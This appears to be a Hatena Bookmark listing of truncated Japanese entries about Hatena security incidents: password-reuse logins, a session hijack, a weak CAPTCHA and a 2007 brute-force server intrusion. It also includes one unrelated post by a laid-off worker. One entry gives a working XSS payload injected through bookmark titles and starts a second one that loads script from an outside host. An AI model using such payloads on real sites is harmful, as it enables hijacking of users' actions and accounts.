2014-02-24
不正ログイン防止のため、パスワードと登録情報のご確認をお願いします 弊社自身の調査により、はてなのサービスに対して外部から不正なログインが行われた可能性があることが判明しました。 ただし、弊社サーバーへの侵入によるアカウント情報の流出や、パスワードを機械的に推測してログインを試行するといった不審な行動は確認されておらず、他社サービスから流出または不正取得されたアカウント情報(IDとパスワードの組み合わせ)を流用された可能性が高いと考えています。 そこで、他社サービスと同一のID(メールアドレスまたはユーザー名)およびパスワードを使用しているユーザー様は、安全のため登録メールアドレスがご自身のものであるかを確認の上、早急にパスワードを変更してください。 それ以外のユーザー様も、下記にあるように登録情報等をご確認の上、より安全なパスワードと、正しく有効なメールアドレスを設定いただけるようお願い
俺、解雇された派遣なんだが
どうしようどうしよう、年を越せるかななんて不安な気持ちでいっぱいなのに、ネットカフェで増田を見ていて、えっと思った。 人材派遣とか、雇用とか、不況とか、解雇とか、そういうワードには、前からびくびくしていて、目にするたびにそういうエントリーを見ていたわけ。それで、腐った経営者のやつらとか、なんとかなんねえかな、なんで俺らみたいなのばかりこんなつらい重い、苦労、そんなのしなけりゃならないのかな、って思ってた。 でも、金はどんどん金がないっていうことが気分を暗くするし、実家に帰っても親がイライラしてるし、やだな、とか、もう、何年も、そんなことばっかり思ってたけど、でも、そういうとき、はてなの中でも、そういう社会問題を議論している人たちがいて、ああ、この人たちは、俺たちが抱えている問題について、真剣に、考えてくれているんだなあって思ってた。そう思うと、ちょっと救われるというか、俺はひとりぼっちじゃ
guldeen 事件は「不正アクセス」なのか? (10/4 追記) - rna fragments
はてなからセキュリティホールを突かれた不正アクセスについての報告があった。 「はてなブックマーク モバイル版」の脆弱性を利用した不正アクセスに関するご報告 - はてなブックマーク日記 - 機能変更、お知らせなど これは先週の連休中に騒ぎになった件。id:guldeen さんのブックマークコメントが何者かによって改竄されたという事件があったのだ。*1 当初パスワードが推測または盗難されたのではないかという話だったが、実際の手口は、いわゆるセッションハイジャックだったようだ。要するに、 guldeen さんが docomo の携帯電話からはてなにログインした ログインした状態でモバイル版はてなブックマークを利用した ログイン情報を含んだリンクがはてなのサーバの共有部分に残ってしまった 他人がはてなにアクセスした時にそのリンクが表示されてしまう状態だった 誰か(以下 X)がそのリンクをクリックし
はてなブックマーク開発ブログ
はてなブックマークのブックマーク数が多い順に記事を紹介する「はてなブックマーク数ランキング」。2月26日(月)~3月3日(日)〔2024年3月第1週〕のトップ30です*1。 順位 タイトル 1位 メルカリ 小泉さんからのエグい学び|Shota Horii 2位 行動をチャンク化して「1日に1ターンしか行動できない」から脱却する | Piyopanman 3位 「それって陰謀論じゃないですか?」闇の国家「ディープステート」を信じる著名人一人一人に会ってみたら…どうなった? | 47NEWS 4位 いつか起業したいエンジニアへ #キャリア - Qiita 5位 日本人はなぜ「生産性の高い社会」を理解できないふりをし続けるのか 6位 「情報セキュリティの敗北史」が面白すぎる。だめだこれは寝れない、なんだこの死ぬほどワクワクする本は→賢者は歴史に学ぶ - Togetter 7位 味付け塩だけ、放置
はてなのCAPTCHAは簡単に破れる
CAPTCHAをご存知でしょうか。 スパム防止のために歪んだ文字とかを入力させる、アレのことなのですが、 はてなのCAPTCHAの強度が妙に低く思えたので検証してみました。 CAPTCHAというのはいわゆる逆チューリングテストという奴で、 人間には可能だが機械には処理しにくいことをさせることで、 ロボットによる操作を弾こうというものです。 たとえば、Gmailのユーザ登録には以下のような画像が表示され、 表示されている文字を入力することが求められます。 CAPTCHAの強度 例えばスパムを送るために大量のGmailアカウントを得ようとしてる人がいたとします。 手作業でGmailを登録するのは骨が折れる。 そこでプログラムによる機械化を試みることになるわけです。 その際、障壁となるのがこのCAPTCHAなのです。 この画像から正解である文字列"vittac"を得ることは機械には難しい。 プロ
2007-03-17
不正侵入調査の概略について 先日発生しましたはてなサーバーへの不正侵入調査の内容について、より具体的な説明に対するご要望を頂いております。 今回の不正侵入に対する調査では、サーバーをサービス提供ネットワークから切り離し、安全性の確認されたコマンドを用いて証拠保全を行い、保全作業によって収集された情報を用いて調査を行いました。 具体的には、侵入者が残したログ、Linuxファイルシステムに保存されたディレクトリ/ファイルのアクセス時刻、動的ライブラリの最終リンク時刻、侵入経路からアクセス可能な他サーバーのログファイル、アカウント情報が記載されているファイルの更新時刻などをもとにしております。 ここから侵入者がなり得たアカウントを特定、当該アカウントにて侵入者が行ったと思われる操作を調査し、先日発表しましたように「データベース上のユーザー情報が取得されたり、皆様にご利用いただいているサービスのデ
2007-03-15
はてなサーバーへの不正な侵入について2 昨日報告いたしました弊社サーバーへの不正侵入につきまして、その後詳細な調査を行いましたところ、昨日報告した2台のサーバーに加えて、昨日の侵入対策の際に構成を変更したホストにもセキュリティ設定の不備があり、もう一台はてなサーバー群の入り口にあたるホストへの侵入が行われていたことが判りました。 現在は当該ホストも昨日の対応に同じく不正アクセスを遮断、ネットワークから隔離し別サーバーでリプレイスする作業を完了しております。 調査の結果、侵入方法、侵入経路ならびに被害は昨日のものと同様でした。そのため、データベース上のユーザー情報、皆様にご利用いただいているサービスのデータが取得/改竄された可能性は低いと考えております。 今回の不正侵入を受けて本日弊社社内にて協議検討を行い、管理体制とセキュリティポリシーの見直し並びに監視体制の強化、新たに監視システムの開発
機能変更、お知らせなど - はてなの日記 - はてなサーバーへの不正な侵入について
はてなサーバーへの不正な侵入について 本日、はてなのサービスを提供する2台のサーバーに、先週金曜日より不正な侵入が行われていたことが判明しました。 はてなでは本日午前4時頃にこの事実を認識し、午前6時頃に不正なアクセスの遮断を行いました。また、現在継続的に詳細な調査、対策を行っております。 今回の不正侵入は、はてなサーバー群の入り口に当たるサーバーのうちの2台に対して、サーバーのログイン情報を機械的に総当たりする方法によって行われました。不正侵入に成功したアカウントにより、ftp scanner, irc botプログラムが設置され、外部に対して実行されるという被害が発生しました。 はてなではさらに、内部に存在するデータベースサーバーなどへのアクセスの形跡などについて調査を行いましたが、これらの形跡は発見されておらず、データベース上のユーザー情報が取得されたり、皆様にご利用いただいているサ
はてなブックマークの超べんり機能 :: ぼくはまちちゃん!
タイトルを↓みたいに編集すれば、ユーザーが自由にScriptつかえちゃうんだね! ぼく、ゆめがひろがりんぐです! "width=100 height=100 onmouseover=alert(String.fromCharCode(88,83,83)) ※最初にダブルクォート、最後に空白をひとついれる。 あ、人気エントリーのタイトルとか書き換えたらダメだよ…! えらいことになっちゃうかも? (追記) http://test/ ってurlのブックマークにテスト用のコードを置いてみたよ! タイトルが以下になってて hamachiya.com/h のscriptを呼び出す感じ。 (消しゴムに触れると呼び出されて、hamachiya.comをブックマークに追加してしまうという内容) "width=100 height=100 onmouseover=d=document;t=String; s=
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
http://twitter.com/guldeen/status/4170749637
【魚拓】はてなダイアリー日記
http://www.nikkeibp.co.jp/news/flash/518589.html